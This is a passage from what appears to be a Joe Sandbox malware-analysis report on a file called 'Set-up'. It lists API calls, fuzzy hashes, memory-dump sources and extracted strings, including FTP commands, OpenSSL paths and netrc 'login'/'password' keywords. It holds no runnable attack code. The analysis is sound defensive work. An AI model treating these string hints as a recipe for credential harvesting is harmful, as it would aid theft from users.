                          • Instruction ID: 4bf6fdf3f1b06113b0cf425036d956dd225193a23f4d215d01f2f41e78970dda
                          • Opcode Fuzzy Hash: bf03f6a68b4dfad5224d2a5048699ab8af2a4461cbabbcc595c5bbfd2236b620
                          • Instruction Fuzzy Hash: 5F1369706083418FD726DF28C08466BBBE1FF8A358F254A2DE9959B361D771EC45CB82
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$???$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$LIST$NLST$PORT$PRET$PRET %s$PRET RETR %s$PRET STOR %s$STOP$[%s] -> [%s]$[%s] ftp_state_use_port(), listening on %d$[%s] ftp_state_use_port(), opened socket$[%s] ftp_state_use_port(), socket bound to port %d$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                          • API String ID: 0-1569884781
                          • Opcode ID: a57d7f07c5ae77f24f656430c3f6c93d13b8cac8e6ae6d659d9b8b5cba873705
                          • Instruction ID: 7b75d937ffbf364bf06c79c148b2a8df5f43266d67219ca96bf189710d961263
                          • Opcode Fuzzy Hash: a57d7f07c5ae77f24f656430c3f6c93d13b8cac8e6ae6d659d9b8b5cba873705
                          • Instruction Fuzzy Hash: 67421379608380AFD760DB24DC45BAB7BEAEF94704F184829F885C7292E730DD45C7A2
                          APIs
                          • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 0002E6F1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: fputc
                          • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                          • API String ID: 1992160199-2555271450
                          • Opcode ID: 4ae44570b895db20366752beb14ba5d5e3d1a158fe132d5ba601651c30b3f14a
                          • Instruction ID: 998bff498ae5be9332ba431944d4f0b8a78c8a7c5bd9b3327d0ee684a9074c4f
                          • Opcode Fuzzy Hash: 4ae44570b895db20366752beb14ba5d5e3d1a158fe132d5ba601651c30b3f14a
                          • Instruction Fuzzy Hash: 7C82BD71A083529FD764CE28D88072BB7E1EFC5764F188A3DF8A997291D730DC458B92
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000040), ref: 002B0374
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000080), ref: 002B0395
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008), ref: 002B049D
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000004), ref: 002B04E7
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?), ref: 002B055F
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000298,?,?), ref: 002B057A
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 002B0618
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,0000005C,?), ref: 002B06E3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: @$MD5$SHA1$SHA2-224$SHA2-256$SHA2-384$SHA2-512
                          • API String ID: 1297977491-3776850024
                          • Opcode ID: e00c328f538f030ad1ad1f3a0ac8dc18a45dbcc2a837543eda3c0783cdaaf3f5
                          • Instruction ID: 2a7eced246dbde7127cda91c81f189392f5e2860d8fa6c49f39b3879ebda4505
                          • Opcode Fuzzy Hash: e00c328f538f030ad1ad1f3a0ac8dc18a45dbcc2a837543eda3c0783cdaaf3f5
                          • Instruction Fuzzy Hash: A15291729187818BD711CF28C885BEBB7E4BFD9344F048A2DF9C896252E774D914CB92
                          APIs
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 001FE28D
                          • FindNextFileW.KERNEL32(?,00000000), ref: 001FE2BB
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,0000000100000001,?,00000100,00000000,00000000,?,?), ref: 001FE30A
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 001FE3C7
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001FE3DD
                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000354), ref: 001FE3F8
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000000), ref: 001FE41A
                          • MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 001FE44E
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 001FE563
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 001FE571
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide_errno$FileFindNextcallocfreestrlen
                          • String ID:
                          • API String ID: 1393009926-0
                          • Opcode ID: 6760b9f4c8a46557f52a40b27c5bf4d2245bbc306bdf6a4d9bb95958e2e7b404
                          • Instruction ID: 3de6938a46553e0c32a6b7c71df1977195388f8257c3eacb1cab85ed0eb0ed4e
                          • Opcode Fuzzy Hash: 6760b9f4c8a46557f52a40b27c5bf4d2245bbc306bdf6a4d9bb95958e2e7b404
                          • Instruction Fuzzy Hash: C7913730600B019FD7218F34CC89B76BBE6FF85325F184669EA558B6B2EB30E950CB50
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 003906A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: $
                          • API String ID: 3510742995-227171996
                          • Opcode ID: e847658522d8ba5d325fca2206a5cf75dae0f8a8038ae1a3b08976dd91af7123
                          • Instruction ID: 07420a73ecdf2134a8114585877db222b345c05a6333e96dce1d40d0e9d7a9c6
                          • Opcode Fuzzy Hash: e847658522d8ba5d325fca2206a5cf75dae0f8a8038ae1a3b08976dd91af7123
                          • Instruction Fuzzy Hash: B4D29E72A087558FCB25CF28C88026AF7E2FFC5704F198A2DE99997351D770A945CB82
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00268A66
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00268A88
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000010), ref: 00268B45
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00268B59
                          Strings
                          • providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c, xrefs: 00268A42, 00268F13
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c
                          • API String ID: 1297977491-3184136495
                          • Opcode ID: cf19704ecc6d39236c95ceffa73a7c70885b1a798bcefd0468b4dc9be273c332
                          • Instruction ID: 114fd586012736f68462d3f3dd9eb82a1b9e31464aba53900a8c70b7ea3ce2cc
                          • Opcode Fuzzy Hash: cf19704ecc6d39236c95ceffa73a7c70885b1a798bcefd0468b4dc9be273c332
                          • Instruction Fuzzy Hash: D42202725187429BD711CF38C881BABB7E4FF96304F044A1DF89597282DB71E994CB92
                          APIs
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 003A47A3
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 003A47C1
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 003A4800
                          • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 003A4D16
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _strdupmemcpystrchrstrlen
                          • String ID: H$xn--
                          • API String ID: 1602650251-4022323365
                          • Opcode ID: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                          • Instruction ID: 657d7586d56dd79bed1b4a77647956e2a5a0ca8eaf6c8e21a013a19d26830aee
                          • Opcode Fuzzy Hash: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                          • Instruction Fuzzy Hash: FCE13771A087158FD719DE28D8C072AB7D2EBC6314F198A3DE9D687381E7B5DC058742
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0032C090
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000102), ref: 0032C0BE
                          Strings
                          • assertion failed: ctx->length <= (int)sizeof(ctx->enc_data), xrefs: 0032C433
                          • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 0032C0CD, 0032C26B
                          • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./, xrefs: 0032C0D2, 0032C266
                          • crypto/evp/encode.c, xrefs: 0032C42E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$assertion failed: ctx->length <= (int)sizeof(ctx->enc_data)$crypto/evp/encode.c
                          • API String ID: 3510742995-2458911571
                          • Opcode ID: 31b7f263adb20acbf12b52c005124500a345ac1ca6ae3c3fb9e93521300c4f8b
                          • Instruction ID: 2dd98548b04b908921128fd45fd39522a4668526e5135db98e4193c2f6b0c0cc
                          • Opcode Fuzzy Hash: 31b7f263adb20acbf12b52c005124500a345ac1ca6ae3c3fb9e93521300c4f8b
                          • Instruction Fuzzy Hash: 26C1297550C3A58FC716DF18D49062EBFE1AF96300F0989ADE9D58B382D235ED01CB92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$@$@$ssl/quic/quic_txp.c
                          • API String ID: 0-600063881
                          • Opcode ID: d3538c61e90d8ee2184a67760798c5510c207f812a5bad2f73ab4603d76e9c0e
                          • Instruction ID: 68e019489559805322576bc825a2a0b88c2e3cf66e20ed1f7160faec1a0fca86
                          • Opcode Fuzzy Hash: d3538c61e90d8ee2184a67760798c5510c207f812a5bad2f73ab4603d76e9c0e
                          • Instruction Fuzzy Hash: A653D3716083419FD725DF28C880BAAB7E1FF95314F18492DE89987391EB75EA44CF82
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: default$login$macdef$machine$netrc.c$password
                          • API String ID: 0-1043775505
                          • Opcode ID: 1c11ef471ce629422780a454ea5532ba50254266e08d46a94a0bf7777617885e
                          • Instruction ID: f3a7b12db48c280f555ac89d12124b4e150432aa376bd28921a1aaccc1ff4bf4
                          • Opcode Fuzzy Hash: 1c11ef471ce629422780a454ea5532ba50254266e08d46a94a0bf7777617885e
                          • Instruction Fuzzy Hash: D9E1057090C3519BE321AF24988576FBFD4BF96708F1A442CF8C557282E7B6DA48C792
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: ?h
                          • API String ID: 0-4286994378
                          • Opcode ID: 7d2d8de7463a75a03d05669072d45b97e852f40cd75a2c756eb9935f9321dcf2
                          • Instruction ID: f947452548b904207682022333a79b1ae1aaf85763ecaa4a5faae378c9f19645
                          • Opcode Fuzzy Hash: 7d2d8de7463a75a03d05669072d45b97e852f40cd75a2c756eb9935f9321dcf2
                          • Instruction Fuzzy Hash: 8FA29C71A08B169FC729CF29C490669F7E1FB88314F15C66DD8A98B781D378F861CB81
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,0008000F,00000008,?,00212212,00000000,00000000), ref: 00190109
                            • Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7262
                            • Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7285
                            • Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72C5
                            • Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
